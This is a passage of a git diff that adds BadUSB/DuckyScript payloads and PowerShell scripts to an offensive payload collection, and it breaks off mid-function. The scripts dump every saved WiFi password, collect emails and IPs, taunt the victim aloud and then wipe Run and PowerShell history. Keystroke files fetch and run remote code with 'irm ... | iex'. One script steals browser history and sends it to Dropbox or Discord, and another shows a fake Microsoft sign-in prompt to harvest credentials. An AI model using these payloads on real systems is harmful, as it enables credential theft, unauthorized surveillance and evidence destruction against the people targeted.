+ $goodRAM = "$RAM gigs of ram? Can almost guarantee you have a light up keyboard.. you are a wanna be streamer huh?"
+
+ $impressiveRAM = "$RAM gigs of ram? are you serious? a super computer with no security that is funny right there"
+#----------------------------------------------------------------------------------------------------
+
+ if($RAM -le 4){
+ return $lowRAM
+ } elseif($RAM -ge 5 -and $RAM -le 12){
+ return $okRAM
+ } elseif($RAM -ge 13 -and $RAM -le 24){
+ return $goodRAM
+ } else {
+ return $impressiveRAM
+ }
+
+ }
+
+ # If one of the above parameters is not detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "Error in search"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+}
+
+# echo statement used to track progress while debugging
+echo "RAM Info Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Public IP
+ This will get the public IP from the target computer
+#>
+
+
+function Get-PubIP {
+
+ try {
+
+ $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
+
+ }
+
+ # If no Public IP is detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No Public IP was detected"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+
+ return "your public I P address is $computerPubIP"
+}
+
+# echo statement used to track progress while debugging
+echo "Pub IP Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Wifi Network and Password
+ This function will custom a tailor response based on how many characters long their password is
+#>
+
+
+function Get-Pass {
+
+ #-----VARIABLES-----#
+ # $pwl = their Pass Word Length
+ # $pass = their Password
+
+ try {
+
+ $pro = netsh wlan show interface | Select-String -Pattern ' SSID '; $pro = [string]$pro
+ $pos = $pro.IndexOf(':')
+ $pro = $pro.Substring($pos+2).Trim()
+
+ $pass = netsh wlan show profile $pro key=clear | Select-String -Pattern 'Key Content'; $pass = [string]$pass
+ $passPOS = $pass.IndexOf(':')
+ $pass = $pass.Substring($passPOS+2).Trim()
+
+ if($pro -like '*_5GHz*') {
+ $pro = $pro.Trimend('_5GHz')
+ }
+
+ $pwl = $pass.length
+
+
+ }
+
+ # If no network is detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No network was detected"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $badPASS = "$pro is not a very creative name but at least it is not as bad as your wifi password... only $pwl characters long? $pass ...? really..? $pass was the best you could come up with?"
+
+ $okPASS = "$pro is not a very creative name but at least you are trying a little bit, your password is $pwl characters long, still trash though.. $pass ...? You can do better"
+
+ $goodPASS = "$pro is not a very creative name but At least you are not a total fool... $pwl character long password actually is not bad, but it did not save you from me did it? no..it..did..not! $pass is a decent password though."
+#----------------------------------------------------------------------------------------------------
+
+ if($pass.length -lt 8) { return $badPASS
+
+ }elseif($pass.length -gt 7 -and $pass.length -lt 12) { return $okPASS
+
+ }else { return $goodPASS
+
+ }
+}
+
+# echo statement used to track progress while debugging
+echo "Wifi pass Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ All Wifi Networks and Passwords
+ This function will gather all current Networks and Passwords saved on the target computer
+ They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
+#>
+
+Function Get-Networks {
+# Get Network Interfaces
+$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
+
+# Get Wifi SSIDs and Passwords
+$WLANProfileNames =@()
+
+#Get all the WLAN profile names
+$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
+
+#Trim the output to receive only the name
+Foreach($WLANProfileName in $Output){
+ $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
+}
+$WLANProfileObjects =@()
+
+#Bind the WLAN profile names and also the password to a custom object
+Foreach($WLANProfileName in $WLANProfileNames){
+
+ #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
+ try{
+ $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
+ }Catch{
+ $WLANProfilePassword = "The password is not stored in this profile"
+ }
+
+ #Build the object and add this to an array
+ $WLANProfileObject = New-Object PSCustomobject
+ $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
+ $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
+ $WLANProfileObjects += $WLANProfileObject
+ Remove-Variable WLANProfileObject
+ return $WLANProfileObjects
+}
+}
+
+$Networks = Get-Networks
+
+Add-Type @"
+using System;
+using System.Runtime.InteropServices;
+public class PInvoke {
+ [DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
+ [DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
+}
+"@
+$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
+$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
+$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
+
+<#
+
+.NOTES
+ This will take the image you generated and set it as the targets wall paper
+#>
+
+Function Set-WallPaper {
+
+<#
+
+ .SYNOPSIS
+ Applies a specified wallpaper to the current user's desktop
+
+ .PARAMETER Image
+ Provide the exact path to the image
+
+ .PARAMETER Style
+ Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
+
+ .EXAMPLE
+ Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
+ Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
+
+#>
+
+
+param (
+ [parameter(Mandatory=$True)]
+ # Provide path to image
+ [string]$Image,
+ # Provide wallpaper style that you would like applied
+ [parameter(Mandatory=$False)]
+ [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
+ [string]$Style
+)
+
+$WallpaperStyle = Switch ($Style) {
+
+ "Fill" {"10"}
+ "Fit" {"6"}
+ "Stretch" {"2"}
+ "Tile" {"0"}
+ "Center" {"0"}
+ "Span" {"22"}
+
+}
+
+If($Style -eq "Tile") {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
+
+}
+Else {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
+
+}
+
+Add-Type -TypeDefinition @"
+using System;
+using System.Runtime.InteropServices;
+
+public class Params
+{
+ [DllImport("User32.dll",CharSet=CharSet.Unicode)]
+ public static extern int SystemParametersInfo (Int32 uAction,
+ Int32 uParam,
+ String lpvParam,
+ Int32 fuWinIni);
+}
+"@
+
+ $SPI_SETDESKWALLPAPER = 0x0014
+ $UpdateIniFile = 0x01
+ $SendChangeEvent = 0x02
+
+ $fWinIni = $UpdateIniFile -bor $SendChangeEvent
+
+ $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
+}
+
+#############################################################################################################################################
+
+Function WallPaper-Troll {
+
+if (!$Networks) { Write-Host "variable is null"
+}else {
+
+ # This is the name of the file the networks and passwords are saved
+
+ $FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_WiFi-PWD.txt"
+
+ ($Networks| Out-String) >> $Env:temp\$FileName
+
+ $content = [IO.File]::ReadAllText("$Env:temp\$FileName")
+
+
+# this is the message that will be coded into the image you use as the wallpaper
+
+ $hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
+
+# this will be the name of the image you use as the wallpaper
+
+ $ImageName = "dont-be-suspicious"
+
+<#
+
+.NOTES
+ This will get take the information gathered and format it into a .jpg
+#>
+
+ Add-Type -AssemblyName System.Drawing
+
+ $filename = "$env:tmp\foo.jpg"
+ $bmp = new-object System.Drawing.Bitmap $w,$h
+ $font = new-object System.Drawing.Font Consolas,18
+ $brushBg = [System.Drawing.Brushes]::White
+ $brushFg = [System.Drawing.Brushes]::Black
+ $graphics = [System.Drawing.Graphics]::FromImage($bmp)
+ $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
+ $graphics.DrawString($content,$font,$brushFg,500,100)
+ $graphics.Dispose()
+ $bmp.Save($filename)
+
+# Invoke-Item $filename
+
+<#
+
+.NOTES
+ This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
+ Then it will clean up the files you don't want to leave behind
+#>
+
+ echo $hiddenMessage > $Env:temp\foo.txt
+ cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
+
+ rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
+
+
+#############################################################################################################################################
+
+
+# This will open up notepad with all their saved networks and passwords and taunt them
+
+
+ $s.Speak("wanna see something really cool?")
+ Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
+ $s.Speak("Look at all your other passswords I got..")
+ Start-Sleep -Seconds 1
+ $s.Speak("These are the wifi passwords for every network you've ever connected to!")
+ Start-Sleep -Seconds 1
+ $s.Speak("I could send them to myself but i wont")
+
+}
+
+# echo statement used to track progress while debugging
+echo "All Wifi Passes Done"
+}
+
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Password last Set
+ This function will custom tailor a response based on how long it has been since they last changed their password
+#>
+
+
+ function Get-Days_Set {
+
+ #-----VARIABLES-----#
+ # $pls (password last set) = the date/time their password was last changed
+ # $days = the number of days since their password was last changed
+
+ try {
+
+ $pls = net user $env:UserName | Select-String -Pattern "Password last" ; $pls = [string]$pls
+ $plsPOS = $pls.IndexOf("e")
+ $pls = $pls.Substring($plsPOS+2).Trim()
+ $pls = $pls -replace ".{3}$"
+ $time = ((get-date) - (get-date "$pls")) ; $time = [string]$time
+ $DateArray =$time.Split(".")
+ $days = [int]$DateArray[0]
+ }
+
+ # If no password set date is detected function will return $null to cancel Sapi Speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "Day password set not found"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $newPass = "$pls was the last time you changed your password... You changed your password $days days ago.. I have to applaud you.. at least you change your password often. Still did not stop me! "
+
+ $avgPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, really starting to push it, i mean look i am here. that tells you something "
+
+ $oldPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, you were basically begging me to hack you, well here i am! "
+#----------------------------------------------------------------------------------------------------
+
+ if($days -lt 45) { return $newPass
+
+ }elseif($days -gt 44 -and $days -lt 182) { return $avgPASS
+
+ }else { return $oldPASS
+
+ }
+}
+
+# echo statement used to track progress while debugging
+echo "Pass last set Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Get Email
+ This function will custom tailor a response based on what type of email the target has
+#>
+
+function Get-email {
+
+ try {
+
+ $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
+
+ $emailpos = $email.IndexOf("@")
+
+ $domain = $email.Substring($emailpos+1) #.TrimEnd(".com")
+
+ }
+
+# If no email is detected function will return backup message for sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "An email was not found"
+ return "you're lucky you do not have your email connected to your account, I would have really had some fun with you then lol"
+ -ErrorAction SilentlyContinue
+ }
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $gmailResponse = "At least you use G Mail.. we should be friends. If you are down just email me back, ill message you at $email. That is your email right?"
+ $yahooResponse = "a yahoo account seriously? you are either in your 50's or just got done doing some time, a lot of it.. $email .. this is sad"
+ $hotmailResponse = "really?. you have a hotmail account? $email .. I am sending this to the f b I they need to check your hard drive"
+ $otherEmailResponse = "I dead ass do not even know what this is.. $email .. hope you did not think it was safe"
+#----------------------------------------------------------------------------------------------------
+
+ if($email -like '*gmail*') { return $gmailResponse
+
+ }elseif($email -like '*yahoo*') { return $yahooResponse
+
+ }elseif($email -like '*hotmail*') { return $hotmailResponse
+
+ }else { return $otherEmailResponse}
+
+
+}
+
+# echo statement used to track progress while debugging
+echo "Email Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Messages
+ This function will run all the previous functions and assign their outputs to variables
+#>
+
+$intro = "$fullName , it has been a long time my friend"
+
+$RAMwarn = Get-RAM
+
+$PUB_IPwarn = Get-PubIP
+
+$PASSwarn = Get-Pass
+
+$LAST_PASSwarn = Get-Days_Set
+
+$EMAILwarn = Get-email
+
+$OUTRO = "My crime is that of curiosity.... and yea curiosity killed the cat.... but satisfaction brought him back.... later $fullName"
+
+# echo statement used to track progress while debugging
+echo "Speak Variables set"
+
+###########################################################################################################
+
+# This turns the volume up to max level--------------------------------------------------------------------
+
+#$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
+
+# echo statement used to track progress while debugging
+echo "Volume to max level"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ These two snippets are meant to be used as indicators to let you know the script is set up and ready
+ This will display a pop up window saying "hello $fullname"
+ Or this makes the CapsLock indicator light blink however many times you set it to
+ if you do not want the ready notice to pop up or the CapsLock light to blink comment them out below
+#>
+
+# a popup will be displayed before freezing the script while waiting for the cursor to move to continue the script
+# else capslock light will blink as an indicator
+$popmessage = "Hello $fullName"
+
+
+$readyNotice = New-Object -ComObject Wscript.Shell;$readyNotice.Popup($popmessage)
+
+
+# caps lock indicator light
+$blinks = 3;$o=New-Object -ComObject WScript.Shell;for ($num = 1 ; $num -le $blinks*2; $num++){$o.SendKeys("{CAPSLOCK}");Start-Sleep -Milliseconds 250}
+
+
+
+#-----------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ Then the script will be paused until the mouse is moved
+ script will check mouse position every indicated number of seconds
+ This while loop will constantly check if the mouse has been moved
+ "CAPSLOCK" will be continuously pressed to prevent screen from turning off
+ it will then sleep for the indicated number of seconds and check again
+ when mouse is moved it will break out of the loop and continue the script
+#>
+
+
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+echo "it worked"
+
+###########################################################################################################
+
+# this is where your message is spoken line by line
+
+$s=New-Object -ComObject SAPI.SpVoice
+
+# This sets how fast Sapi Speaks
+
+$s.Rate = -1
+
+$s.Speak($intro)
+
+$s.Speak($RAMwarn)
+
+$s.Speak($PUB_IPwarn)
+
+$s.Speak($PASSwarn)
+
+WallPaper-Troll
+
+$s.Speak($LAST_PASSwarn)
+
+$s.Speak($EMAILwarn)
+
+$s.Speak($OUTRO)
+
+###########################################################################################################
+
+# this snippet will leave a message on your targets desktop
+
+$message = "`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back"
+
+Add-Content $home\Desktop\WithLove.txt $message
+###########################################################################################################
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+#----------------------------------------------------------------------------------------------------
+
+# This script repeatedly presses the capslock button, this snippet will make sure capslock is turned back off
+
+Add-Type -AssemblyName System.Windows.Forms
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
diff --git a/Payloads/AcidBurn/AcidBurn.txt b/Payloads/AcidBurn/AcidBurn.txt
new file mode 100644
index 0000000..c8ae244
--- /dev/null
+++ b/Payloads/AcidBurn/AcidBurn.txt
@@ -0,0 +1,16 @@
+REM Title: AcidBurn
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to torment your target to the fullest extent. Mission to recon then roast. See README.md for more details
+
+REM Target: Windows 10, 11
+
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass irm https://jakoby.lol/zyg | iex
+ENTER
diff --git a/Payloads/AcidBurn/README.md b/Payloads/AcidBurn/README.md
new file mode 100644
index 0000000..1293201
--- /dev/null
+++ b/Payloads/AcidBurn/README.md
@@ -0,0 +1,129 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Acid Burn
+
+A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
+
+## Description
+
+This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with the Microsoft account.
+The SSID and WiFi password of any current or previously connected to networks.
+It determines the last day they changed their password and how many days ago.
+Once the information is gathered, the script will pause until a mouse movement is detected.
+Then, the script uses Sapi speak to roast their set up and lack of security.
+If wifi networks and passwords are detected, the wallpaper will be changed to an image displaying that information.
+The generated image will be saved to the desktop and steganography is used to put a hidden message at the bottom of the binary output of the generated image.
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+```
+powershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/zyg | iex
+```
+
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+* Enumerate and get Full Name, Amount of RAM, Public IP, Wifi Password Length, Wifi Networks and Passwords, Day Password was last changed, Email
+* Custom responses have been programmed to roast the target based on the information gathered during enumeration phase
+* Wifi Networks and passwords will be generated into an image that will be saved on the desktop
+* Image opened in notepad will reveal a hidden message at the bottom of the binary output
+* Script will freeze until a mouse movement is detected
+* Sapi Speak will be used to speak out loud the custom responses
+* Desktop wallpaper will be changed to the image of the targets Wifi Networks and Passwords
+* Text file will be left on the target desktop with whatever message you choose
+
+
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+Arf
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+* [0iphor13](https://github.com/0iphor13)
+* [PhilSutter](https://github.com/PhilSutter)
+
+
+(back to top)
diff --git a/Payloads/AcidBurn/hacked-wallpaper.jpg b/Payloads/AcidBurn/hacked-wallpaper.jpg
new file mode 100644
index 0000000..d04161d
Binary files /dev/null and b/Payloads/AcidBurn/hacked-wallpaper.jpg differ
diff --git a/Payloads/BrowserData/README.md b/Payloads/BrowserData/README.md
new file mode 100644
index 0000000..a597f52
--- /dev/null
+++ b/Payloads/BrowserData/README.md
@@ -0,0 +1,89 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - The Function
+ - Contact
+ - Acknowledgments
+
+
+
+# Get-BrowserData
+
+
+
+ 
+
+
YouTube Tutorial
+
+
+## Description
+
+This payload can be used to retrieve the browsing history and bookmarks from Edge, Chrome, Opera GX, and Firefox (no bookmarks from firefox currently).
+
+They are then exfiled using either Discord or Dropbox.
+
+## The Function
+
+### [Get-BrowserData]
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+* You no longer need to host your own version of this script
+* $db is the variable that holds your DropBox token
+* $dc is the variable that holds your Discord webhook
+* Fill in either variable or both to set your exfil method
+
+SYNTAX:
+
+```
+powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/hgw | iex
+```
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [UberGuidoZ](https://github.com/UberGuidoZ)
diff --git a/Payloads/BrowserData/browserData.ps1 b/Payloads/BrowserData/browserData.ps1
new file mode 100644
index 0000000..1d7941d
--- /dev/null
+++ b/Payloads/BrowserData/browserData.ps1
@@ -0,0 +1,102 @@
+function Get-BrowserData {
+
+ [CmdletBinding()]
+ param (
+ [Parameter (Position=1,Mandatory = $True)]
+ [string]$Browser,
+ [Parameter (Position=1,Mandatory = $True)]
+ [string]$DataType
+ )
+
+ $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
+
+ if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"}
+ elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"}
+ elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"}
+ elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"}
+ elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"}
+ elseif ($Browser -eq 'opera' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\History"}
+ elseif ($Browser -eq 'opera' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\Bookmarks"}
+
+ $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
+ $Value | ForEach-Object {
+ $Key = $_
+ if ($Key -match $Search){
+ New-Object -TypeName PSObject -Property @{
+ User = $env:UserName
+ Browser = $Browser
+ DataType = $DataType
+ Data = $_
+ }
+ }
+ }
+}
+
+Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\--BrowserData.txt
+
+Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\--BrowserData.txt
+
+Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\--BrowserData.txt
+
+Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP--BrowserData.txt
+
+Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\--BrowserData.txt
+
+Get-BrowserData -Browser "opera" -DataType "history" >> $env:TMP\--BrowserData.txt
+
+Get-BrowserData -Browser "opera" -DataType "bookmarks" >> $env:TMP\--BrowserData.txt
+
+# Upload output file to dropbox
+
+function DropBox-Upload {
+
+[CmdletBinding()]
+param (
+
+[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+[Alias("f")]
+[string]$SourceFilePath
+)
+$outputFile = Split-Path $SourceFilePath -leaf
+$TargetFilePath="/$outputFile"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $db
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+}
+
+if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\--BrowserData.txt}
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Upload-Discord {
+
+[CmdletBinding()]
+param (
+ [parameter(Position=0,Mandatory=$False)]
+ [string]$file,
+ [parameter(Position=1,Mandatory=$False)]
+ [string]$text
+)
+
+$hookurl = "$dc"
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $text
+}
+
+if (-not ([string]::IsNullOrEmpty($text))){
+Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
+
+if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
+}
+
+if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\--BrowserData.txt}
+
+
+############################################################################################################################################################
+RI $env:TEMP/--BrowserData.txt
diff --git a/Payloads/BrowserData/browserData.txt b/Payloads/BrowserData/browserData.txt
new file mode 100644
index 0000000..32e8912
--- /dev/null
+++ b/Payloads/BrowserData/browserData.txt
@@ -0,0 +1,17 @@
+REM Title: Browser-Data
+
+REM Author: I am Jakoby
+
+REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, Firefox, and Opera GX.
+
+REM Target: Windows 10, 11
+
+GUI r
+DELAY 500
+STRING powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/hgw | iex
+ENTER
+
+REM Fill in either variable or both to set your exfil method.
+REM $db is the variable that holds your DropBox token.
+REM $dc is the variable that holds your Discord webhook.
+REM If you are using DropBox, also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly.
diff --git a/Payloads/Credz-Plz/Credz-Plz-Execute.txt b/Payloads/Credz-Plz/Credz-Plz-Execute.txt
new file mode 100644
index 0000000..fecba89
--- /dev/null
+++ b/Payloads/Credz-Plz/Credz-Plz-Execute.txt
@@ -0,0 +1,19 @@
+REM Title: Credz-Plz
+
+REM Author: I am Jakoby
+
+REM Description: This payload prompts the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook.
+
+REM See README.md file for more details.
+
+REM Target: Windows 10, 11
+
+GUI r
+DELAY 500
+STRING powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex
+ENTER
+
+REM Fill in either variable or both to set your exfil method.
+REM $db is the variable that holds your DropBox token.
+REM $dc is the variable that holds your Discord webhook.
+REM If you are using DropBox, also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly.
diff --git a/Payloads/Credz-Plz/Credz-Plz.ps1 b/Payloads/Credz-Plz/Credz-Plz.ps1
new file mode 100644
index 0000000..f5c1ef3
--- /dev/null
+++ b/Payloads/Credz-Plz/Credz-Plz.ps1
@@ -0,0 +1,239 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
+
+.DESCRIPTION
+ A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
+ This will be followed by a fake authentication ui prompt.
+ If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
+ Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection
+
+.Link
+ https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
+
+#>
+
+#------------------------------------------------------------------------------------------------------------------------------------
+# This is for if you want to host your own version of the script
+
+# $db = "YOUR-DROPBOX-ACCESS-TOKEN"
+
+# $dc = "YOUR-DISCORD-WEBHOOK"
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to generate the ui.prompt you will use to harvest their credentials
+#>
+
+function Get-Creds {
+
+ $form = $null
+
+ while ($form -eq $null)
+ {
